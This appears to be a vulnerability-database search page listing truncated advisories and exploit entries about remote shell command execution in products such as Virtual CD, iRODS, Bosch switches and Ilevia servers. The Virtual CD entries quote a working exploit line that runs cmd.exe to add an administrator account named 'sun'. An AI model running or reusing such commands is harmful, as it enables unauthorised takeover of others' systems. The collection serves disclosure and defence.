Ilevia EVE X1 Server

RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary shell commands and the disclosure of sensitive system information. 2. RECOMMENDED PRACTICES CISA recommends users take defensive measures to minimize the risk of exploitation of these...

EUVD-2007-0832

Malware in sbrugna...

Exploit for Command Injection in Materialsvirtuallab Pymatgen

A Rust exploitation script for CVE-2024-23346. As shown below t...

PT-2022-3473 · Bosch · Bosch Pra-Es8P2S

Name of the Vulnerable Software and Affected Versions: Bosch PRA-ES8P2S versions 1.01.05 and earlier Description: The issue is related to insufficient input validation in the diagnostics web interface of the Bosch PRA-ES8P2S Ethernet switch. This allows a remote attacker to execute arbitrary...

REINER SCT Reiner TimeCard 信任管理问题漏洞

REINER SCT Reiner TimeCard is a chip card reading device from REINER SCT, Germany, used for access protection in secure online banking devices, terminals for dealers and merchants using girocard payments, and PC workstations. A security vulnerability exists in REINER SCT Reiner TimeCard version...

DeathStalker APT Spices Things Up with PowerPepper Malware

The DeathStalker advanced persistent threat APT group has a hot new weapon: A highly stealthy backdoor that researchers have dubbed PowerPepper, used to spy on targeted systems. DeathStalker offers mercenary, espionage-for-hire services targeting the financial and legal sectors, according to...

Command Execution Vulnerability in SSH of UPS Management Module at VitiTech Ltd.

VitiTech is an uninterruptible power supply, automation control equipment and industrial battery company. A command execution vulnerability exists in SSH, the UPS management module of Verti Technologies Ltd. The vulnerability can be exploited to remotely execute system shell commands bypassing...

Cumulative Update 27 for Microsoft Dynamics NAV 2018 (Build 41203)

Cumulative Update 27 for Microsoft Dynamics NAV 2018 Build 41203 This article applies to Microsoft Dynamics NAV 2018 for all countries and all language locales.A remote code execution vulnerability exists in Microsoft Dynamics NAV. A user who has the permission to access certain features that...

Input validation

Untrusted input execution via igetwild in all iRODS versions before 4.1.11 and 4.2.1 allows other iRODS users potentially anonymous to execute remote shell commands via iRODS virtual pathnames. To exploit this vulnerability, a virtual iRODS pathname that includes a semicolon would be retrieved vi...

CVE-2017-8799

Untrusted input execution via igetwild in all iRODS versions before 4.1.11 and 4.2.1 allows other iRODS users potentially anonymous to execute remote shell commands via iRODS virtual pathnames. To exploit this vulnerability, a virtual iRODS pathname that includes a semicolon would be retrieved vi...

CVE-2017-8799

Untrusted input execution via igetwild in all iRODS versions before 4.1.11 and 4.2.1 allows other iRODS users potentially anonymous to execute remote shell commands via iRODS virtual pathnames. To exploit this vulnerability, a virtual iRODS pathname that includes a semicolon would be retrieved vi...

Virtual CD 9.0.0.2 (vc9api.DLL) Remote Shell Commands Execution Exploit

No description provided by source. !-- IE 6 / Virtual CD 9.0.0.2 vc9api.DLL 9.0.0.57 remote shell commands execution exploit by rgod site: retrogod.altervista.org software site: http://www.virtualcd-online.com/ -- html object classid='clsid:C75848D7-72BD-499C-80F3-FD0ED62DF58C'...

Virtual CD 9.0.0.2 - vc9api.DLL Remote Shell Commands Execution

Virtual CD 9.0.0.2 - vc9api.DLL Remote Shell Commands Execution strCmd="cmd.exe /c net user sun tzu /add | net localgroup Administrators sun /add " strWorkDir="c:\windows\system32" showCmd=1 bWait=1 VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait milw0rm.com 2007-05-21...

Virtual CD 9.0.0.2 (vc9api.DLL) Remote Shell Commands Execution Exploit

Exploit for unknown platform in category remote exploits ======================================================================= Virtual CD 9.0.0.2 vc9api.DLL Remote Shell Commands Execution Exploit ======================================================================= strCmd="cmd.exe /c net use...

Virtual CD 9.0.0.2 - 'vc9api.DLL' Remote Shell Commands Execution

strCmd="cmd.exe /c net user sun tzu /add | net localgroup Administrators sun /add " strWorkDir="c:\windows\system32" showCmd=1 bWait=1 VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait milw0rm.com 2007-05-21...

Security Update: [CSSA-2003-SCO.3] UnixWare 7.1.1 Open UNIX 8.0.0 UnixWare 7.1.3 : ftp vulnerability with pipe symbols in filenames

To: [email protected] [email protected] [email protected] [email protected] SCO Security Advisory Subject: UnixWare 7.1.1 Open UNIX 8.0.0 UnixWare 7.1.3 : ftp vulnerability with pipe symbols in filenames Advisory number: CSSA-2003-SCO.3 Issue date: 2003 March...

Security Advisory YYYY-NNN

-----BEGIN PGP SIGNED MESSAGE----- NetBSD Security Advisory 2000-014 ================================= Topic: Global-3.55 allows world-wide executable cgi. Version: any before 4.01 Severity: permits remote execution of arbitrary shell commands Abstract ======== When using the CGI interface of the...